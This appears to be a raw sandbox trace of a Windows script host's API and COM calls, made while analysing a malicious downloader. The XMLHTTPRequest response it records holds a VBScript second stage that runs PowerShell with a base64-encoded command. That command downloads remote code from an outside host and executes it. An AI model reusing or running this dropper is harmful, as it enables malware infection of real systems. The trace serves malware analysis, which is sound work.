	[0078.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0078.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0078.007] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0078.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0078.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0078.007] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0078.007] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0078.007] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0078.007] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0078.007] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0078.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0078.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0078.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0078.008] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0078.008] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0078.008] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0078.008] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0078.008] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0078.008] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0078.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0078.008] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0078.008] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0078.008] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0078.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0078.009] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0078.009] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0078.009] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0078.009] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0078.009] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0078.009] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5a53e18 | out: ppvObject=0x5a53e18*=0x0) returned 0x80004002
	[0078.010] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0078.011] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0078.011] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x5a547c8 | out: ppvObject=0x5a547c8*=0x0) returned 0x80004002
	[0078.011] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0088.551] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0088.551] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0088.551] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0088.551] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0088.551] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0088.551] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Dim golovs, powernols, masnoslo, nilops\r\nset winsh = CreateObject(\"WScript.Shell\")\r\nset winenv = winsh.Environment(\"Process\")\r\nwindir = winenv(\"WINDIR\")\r\nset Firraryuq2 = CreateObject(\"shell.application\")\r\nmasnoslo = windir+\"\\SysWOW64\\WindowsPowerS\"&\"hell\\v1.0\\power\"&\"she\"&\"ll\"\r\nnilops = 0\r\nFirraryuq2.ShellExecute masnoslo, \" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==\", \"\", \"open\", nilops\r\nmasnoslo = windir+\"\\System32\\WindowsPowerS\"&\"hell\\v1.0\\power\"&\"she\"&\"ll\"\r\nFirraryuq2.ShellExecute masnoslo, \" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==\", \"\", \"open\", nilops\r\nset Firraryuq2 = nothing\r\nset winsh = nothing\r\n", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0088.552] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0088.553] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0088.553] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0088.553] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0088.553] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0088.553] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0088.553] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0088.554] GetTickCount () returned 0x114d6d0
	[0088.554] GetTickCount () returned 0x114d6d0
	[0088.556] malloc (_Size=0x408) returned 0x3f3e90
	[0088.556] malloc (_Size=0x808) returned 0x402d00
	[0088.557] malloc (_Size=0x200) returned 0x3f42a0
	[0088.557] realloc (_Block=0x3f42a0, _Size=0x400) returned 0x403510
	[0088.557] free (_Block=0x403510) 
	[0088.557] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0088.558] malloc (_Size=0x70) returned 0x3e0100
	[0088.559] malloc (_Size=0x1008) returned 0x403510
	[0088.559] malloc (_Size=0xf68) returned 0x404520
	[0088.560] ??2@YAPEAX_K@Z () returned 0x42c950
	[0088.560] GetCurrentThreadId () returned 0x9a8
	[0088.560] GetCurrentThreadId () returned 0x9a8
	[0088.560] GetCurrentThreadId () returned 0x9a8
	[0088.560] GetCurrentThreadId () returned 0x9a8
	[0088.561] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x26c200 | out: lpclsid=0x26c200*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
	[0088.561] SysStringLen (param_1=0x0) returned 0x0
	[0088.561] CoGetClassObject (in: rclsid=0x26c200*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c1d0 | out: ppv=0x26c1d0*=0x42ef40) returned 0x0
	[0088.561] DllGetClassObject (in: rclsid=0x8cc20*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c1d0 | out: ppv=0x26c1d0*=0x42ef40) returned 0x0
	[0088.561] ??2@YAPEAX_K@Z () returned 0x42ef40
	[0088.561] ??2@YAPEAX_K@Z () returned 0x3ea060
	[0088.561] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26c000, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f
	[0088.561] lstrlenA (lpString="\\wscript.exe") returned 12
	[0088.561] lstrlenA (lpString="C:\\Windows\\System32\\CScript.exe") returned 31
	[0088.562] _strcmpi (_Str1="\\CScript.exe", _Str2="\\wscript.exe") returned -20
	[0088.562] _strcmpi (_Str1="\\CScript.exe", _Str2="\\cscript.exe") returned 0
	[0088.562] GetModuleHandleA (lpModuleName=0x0) returned 0xff6e0000
	[0088.563] GetProcAddress (hModule=0xff6e0000, lpProcName=0x1) returned 0xff6e1a60
	[0088.563] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0088.563] IUnknown:Release (This=0x3ea060) returned 0x1
	[0088.563] LoadRegTypeLib (in: rguid=0x7fef3c52df0*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x26c1f0*=0x0 | out: pptlib=0x26c1f0*=0x5a48f30) returned 0x0
	[0088.564] ITypeLib:GetTypeInfoOfGuid (in: This=0x5a48f30, GUID=0x7fef3c52c30*(Data1=0x41904400, Data2=0xbe18, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x8b, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x26c238 | out: ppTInfo=0x26c238*=0x648a4c8) returned 0x0
	[0088.565] ITypeInfo:GetRefTypeOfImplType (in: This=0x648a4c8, index=0xffffffff, pRefType=0x26c228 | out: pRefType=0x26c228*=0xfffffffe) returned 0x0
	[0088.565] ITypeInfo:GetRefTypeInfo (in: This=0x648a4c8, hreftype=0xfffffffe, ppTInfo=0x7fef3c5c128 | out: ppTInfo=0x7fef3c5c128*=0x648a520) returned 0x0
	[0088.565] IUnknown:Release (This=0x648a4c8) returned 0x1
	[0088.565] IUnknown:Release (This=0x5a48f30) returned 0x2
	[0088.565] IUnknown:AddRef (This=0x648a520) returned 0x2
	[0088.565] ITypeInfo:LocalGetIDsOfNames (This=0x648a520) returned 0x0
	[0088.565] IUnknown:Release (This=0x648a520) returned 0x1
	[0088.565] IUnknown:AddRef (This=0x648a520) returned 0x2
	[0088.565] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
	[0088.565] ITypeInfo:LocalInvoke (This=0x648a520) returned 0x0
	[0088.565] ITypeLib:GetTypeComp (in: This=0x3ea060, ppTComp=0x60738 | out: ppTComp=0x60738*=0x20003b00380008) returned 0x0
	[0088.565] lstrlenW (lpString="Process") returned 7
	[0088.565] lstrlenW (lpString="SYSTEM") returned 6
	[0088.565] lstrlenW (lpString="Process") returned 7
	[0088.565] lstrlenW (lpString="USER") returned 4
	[0088.566] lstrlenW (lpString="Process") returned 7
	[0088.566] lstrlenW (lpString="VOLATILE") returned 8
	[0088.566] lstrlenW (lpString="Process") returned 7
	[0088.566] lstrlenW (lpString="PROCESS") returned 7
	[0088.566] ??2@YAPEAX_K@Z () returned 0x42c9f0
	[0088.566] IUnknown:Release (This=0x648a520) returned 0x1
	[0088.566] IUnknown:Release (This=0x42c9a0) returned 0x0
	[0088.566] IUnknown:Release (This=0x648a730) returned 0x0
	[0088.566] ??3@YAXPEAX@Z () returned 0x7c00390001
	[0088.566] IUnknown:Release (This=0x42c9f0) returned 0x1
	[0088.567] LoadRegTypeLib (in: rguid=0x7fef3c52df0*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x26bf50*=0x3ea060 | out: pptlib=0x26bf50*=0x5a48f30) returned 0x0
	[0088.568] ITypeLib:GetTypeInfoOfGuid (in: This=0x5a48f30, GUID=0x7fef3c52e90*(Data1=0xf935dc29, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), ppTInfo=0x26bf98 | out: ppTInfo=0x26bf98*=0x648a6d8) returned 0x0
	[0088.568] ITypeInfo:GetRefTypeOfImplType (in: This=0x648a6d8, index=0xffffffff, pRefType=0x26bf88 | out: pRefType=0x26bf88*=0xfffffffe) returned 0x0
	[0088.568] ITypeInfo:GetRefTypeInfo (in: This=0x648a6d8, hreftype=0xfffffffe, ppTInfo=0x7fef3c5c2a8 | out: ppTInfo=0x7fef3c5c2a8*=0x648a730) returned 0x0
	[0088.568] IUnknown:Release (This=0x648a6d8) returned 0x1
	[0088.568] IUnknown:Release (This=0x5a48f30) returned 0x2
	[0088.568] IUnknown:AddRef (This=0x648a730) returned 0x2
	[0088.568] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
	[0088.568] ITypeInfo:LocalInvoke (This=0x648a730) returned 0x0
	[0088.568] GetEnvironmentVariableW (in: lpName="WINDIR", lpBuffer=0x26b890, nSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa
